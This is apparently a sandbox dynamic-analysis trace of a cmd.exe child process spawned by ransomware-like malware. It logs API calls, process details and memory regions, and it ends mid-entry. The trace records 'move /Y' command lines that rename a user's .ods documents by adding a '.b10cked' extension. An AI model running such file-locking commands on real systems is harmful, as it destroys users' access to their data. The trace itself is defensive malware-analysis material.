[0140.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.718] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.718] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.718] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.718] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.719] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.719] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.719] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.719] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.719] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.719] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.719] GetEnvironmentStringsW () returned 0xe22c0* [0140.719] FreeEnvironmentStringsW (penv=0xe22c0) returned 1 [0140.719] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.719] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.719] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.719] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.719] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.719] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.719] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.719] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.719] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.719] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.719] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf818 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.719] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf818, lpFilePart=0x2cf814 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf814*="Desktop") returned 0x18 [0140.719] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.720] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf594 | out: lpFindFileData=0x2cf594) returned 0xe0000 [0140.720] FindClose (in: hFindFile=0xe0000 | out: hFindFile=0xe0000) returned 1 [0140.720] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf594 | out: lpFindFileData=0x2cf594) returned 0xe0000 [0140.720] FindClose (in: hFindFile=0xe0000 | out: hFindFile=0xe0000) returned 1 [0140.720] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf594 | out: lpFindFileData=0x2cf594) returned 0xe0000 [0140.720] FindClose (in: hFindFile=0xe0000 | out: hFindFile=0xe0000) returned 1 [0140.720] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.720] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.720] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.720] GetEnvironmentStringsW () returned 0xe2ae0* [0140.721] FreeEnvironmentStringsW (penv=0xe2ae0) returned 1 [0140.721] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.721] GetConsoleOutputCP () returned 0x1b5 [0140.721] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.721] GetUserDefaultLCID () returned 0x409 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf958, cchData=128 | out: lpLCData="0") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf958, cchData=128 | out: lpLCData="0") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf958, cchData=128 | out: lpLCData="1") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.722] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.723] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.723] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.724] GetConsoleTitleW (in: lpConsoleTitle=0xd08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.724] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.724] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.724] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.724] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.725] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.725] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.725] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.725] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.725] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.725] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.725] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.728] GetConsoleTitleW (in: lpConsoleTitle=0x2cf650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.057] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.057] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.057] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.057] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.057] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.057] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.057] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.057] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.057] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.057] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.058] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.058] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.058] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.058] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.058] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.058] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.058] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.058] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.058] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.058] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.058] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.058] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.058] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.058] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.058] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.058] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.058] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.058] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.058] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.058] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.058] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.058] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.058] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.058] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.058] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.061] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf40c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf404, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf404*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.061] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.063] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.063] _wcsicmp (_String1="PWKWXR~1.ODS", _String2=".") returned 66 [0141.063] _wcsicmp (_String1="PWKWXR~1.ODS", _String2="..") returned 66 [0141.063] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr~1.ods")) returned 0x20 [0141.063] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe1d48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.063] SetErrorMode (uMode=0x0) returned 0x0 [0141.063] SetErrorMode (uMode=0x1) returned 0x0 [0141.063] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", nBufferLength=0x104, lpBuffer=0x2ced94, lpFilePart=0x2ced7c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", lpFilePart=0x2ced7c*="PWKWXR~1.ODS") returned 0x25 [0141.063] SetErrorMode (uMode=0x0) returned 0x1 [0141.063] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.064] _wcsicmp (_String1="PWKWXR~1.ODS", _String2=".") returned 66 [0141.064] _wcsicmp (_String1="PWKWXR~1.ODS", _String2="..") returned 66 [0141.064] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr~1.ods")) returned 0x20 [0141.064] SetErrorMode (uMode=0x0) returned 0x0 [0141.064] SetErrorMode (uMode=0x1) returned 0x0 [0141.064] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", nBufferLength=0x104, lpBuffer=0x2cf210, lpFilePart=0x2cefa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", lpFilePart=0x2cefa8*="PWKWXR~1.ODS") returned 0x25 [0141.064] SetErrorMode (uMode=0x0) returned 0x1 [0141.064] SetErrorMode (uMode=0x0) returned 0x0 [0141.064] SetErrorMode (uMode=0x1) returned 0x0 [0141.064] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked", nBufferLength=0x104, lpBuffer=0x2cf418, lpFilePart=0x2cefa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked", lpFilePart=0x2cefa8*="pWkwXr56WJA6 l5.ods.b10cked") returned 0x34 [0141.064] SetErrorMode (uMode=0x0) returned 0x1 [0141.064] SetLastError (dwErrCode=0x0) [0141.064] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods.b10cked")) returned 0xffffffff [0141.065] GetLastError () returned 0x2 [0141.065] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x2ce924, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce924) returned 0xd0f10 [0141.065] FindNextFileW (in: hFindFile=0xd0f10, lpFindFileData=0x2ce924 | out: lpFindFileData=0x2ce924) returned 0 [0141.065] GetLastError () returned 0x12 [0141.065] FindClose (in: hFindFile=0xd0f10 | out: hFindFile=0xd0f10) returned 1 [0141.066] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", fInfoLevelId=0x1, lpFindFileData=0xe1ae8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xe1ae8) returned 0xd0f10 [0141.067] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked", nBufferLength=0x104, lpBuffer=0x2cebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked", lpFilePart=0x0) returned 0x34 [0141.067] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods", nBufferLength=0x104, lpBuffer=0x2cebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods", lpFilePart=0x0) returned 0x2c [0141.067] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods")) returned 0x20 [0141.067] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods.b10cked"), dwFlags=0x3) returned 1 [0141.067] FindClose (in: hFindFile=0xd0f10 | out: hFindFile=0xd0f10) returned 1 [0141.068] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ceb70 | out: _Buffer=" 1") returned 9 [0141.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.068] GetFileType (hFile=0x7) returned 0x2 [0141.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceafc | out: lpMode=0x2ceafc) returned 1 [0141.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ceb30 | out: lpConsoleScreenBufferInfo=0x2ceb30) returned 1 [0141.068] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0141.069] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ceb70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0141.069] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ceb54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ceb54*=0x1a) returned 1 [0141.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.069] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.069] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.069] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.069] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.069] SetConsoleInputExeNameW () returned 0x1 [0141.069] GetConsoleOutputCP () returned 0x1b5 [0141.069] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.070] exit (_Code=0) Process: id = "156" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xd58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14596 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14597 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14598 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14599 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14600 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14601 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14602 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14603 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14604 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 14605 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16346 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16347 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16348 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16349 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16350 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 16351 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16352 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16353 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16354 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16355 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16356 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16357 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16358 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16359 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16360 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16361 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16362 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16363 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 16364 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 16365 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 16366 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 16367 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 16368 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 16369 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 213 os_tid = 0xd68 [0142.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f84c | out: lpSystemTimeAsFileTime=0x16f84c*(dwLowDateTime=0x8edd8580, dwHighDateTime=0x1d440a9)) [0142.495] GetCurrentProcessId () returned 0xd58 [0142.495] GetCurrentThreadId () returned 0xd68 [0142.495] GetTickCount () returned 0x2c985 [0142.495] QueryPerformanceCounter (in: lpPerformanceCount=0x16f844 | out: lpPerformanceCount=0x16f844*=19928401632) returned 1 [0142.496] GetModuleHandleA 